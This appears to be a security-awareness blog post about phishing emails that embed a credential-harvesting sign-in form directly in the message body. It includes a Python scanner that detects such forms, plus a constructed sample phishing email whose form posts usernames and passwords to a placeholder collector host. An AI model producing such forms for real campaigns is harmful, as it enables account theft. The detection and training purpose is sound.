Email attacks are constantly mutating into more sophisticated variants. Sometimes new messages and email designs are aimed at people’s psychological triggers. Sometimes attackers use new technological tools. Regardless, we sift through tens of thousands of these attacks every week and incorporate the latest developments into our training programs. It's all about coaching your people to avoid getting hooked into something that will ruin your day… or a whole lot worse.

In Off the Hook, expert Hoxhunters in the threat analysis department pinpoint:
We zero in on a real attack recently spotted in the wild and dissect it so you and your colleagues can spot others like it. And stay Off the Hook!
What's wrong with this picture? Example of a new embedded credential harvesting email.
We spotted a new type of phishing email whose credential harvesting page is smack-dab in the middle of the email body. Its stripped-down, straight-to-the-malicious-layer design makes it particularly dangerous.

Typically, phishing emails contain:
Where a typical phishing email would offer more material to go over and ponder before clicking, this one’s malicious credential harvesting fields are embedded directly into the email itself.

If the victim volunteers his password and presses the "Sign in" button, that data will be sent to the attacker. Password in hand, the hacker will have effectively compromised the email account.
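The distinguishing feature of this attack is a sign-in form sitting inside the message body, and that is something a mail gateway can check for directly. The following Python scanner is an added example, not Hoxhunt's code; it assumes the embedded fields are ordinary HTML form elements, and the sample message and its collector host are constructed placeholders.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a single-part HTML mail with a sign-in form in the body.
SAMPLE_EML = """\
From: "IT Support" <it-support@example.com>
To: victim@example.com
Subject: Your mailbox is almost full
Content-Type: text/html; charset="utf-8"

<p>Your mailbox is almost full. Sign in to keep receiving mail.</p>
<form method="post" action="https://collector.example.invalid/login">
  <input type="email" name="user"><input type="password" name="pass">
  <button type="submit">Sign in</button>
</form>
"""

class _FormScanner(HTMLParser):
    """Records each <form> action and whether it contains a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []       # one dict per form: {"action": str, "password": bool}
        self._current = None  # form currently being parsed, if any
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def find_embedded_credential_forms(raw_eml: str) -> list[str]:
    """Hosts that password-collecting forms in any text/html part would post to."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    hosts = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scanner = _FormScanner()
        scanner.feed(part.get_content())
        hosts += [urlparse(f["action"]).netloc for f in scanner.forms if f["password"]]
    return hosts
```

A legitimate notification never needs a password field in the mail body, so any hit is worth quarantining; the returned host is also a natural pivot for blocking and for hunting earlier deliveries of the same campaign.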
This campaign hijacks a cloud-based automated communication service, which allows the attacker to send gajillions of emails without needing to maintain an email server. These services are commonly used for business-to-customer communications like marketing emails, automated notifications, newsletters, and so on. While one might be tempted to dismiss this credential harvesting scam as an over-simplified spray-and-pray technique, the email’s design actually makes it quite dangerous.

Using these services, attackers can easily fire off large quantities of emails, frequently bypassing spam filters, while leaving fewer digital footprints back to the crime scene. Spoofing the sender fields is also common when using these services, which further camouflages the phishing attack.
We create simulations of new threats in the wild like this one as quickly as possible. Doing so keeps simulations topical, current, and relevant to real threats confronting employees.

Here is an example of a Hoxhunt simulation, which is based on the phishing technique examined in the above post:
If someone enters their credentials and clicks “View message,” the simulation is failed and the employee receives tips on how to spot the threat next time. If the user reports the email via the Hoxhunt plugin, Bravo! They pass the simulation and get a gold star to prove it.

Coaching people to spot actual threats prepares them to report the scam when the real thing lands in their mailbox.

While the actual attack-in-the-wild is categorized as medium in difficulty, this simulation is categorized as “easy” for Hoxhunt users, based on factors in the email and continuous data from users in more than a hundred countries.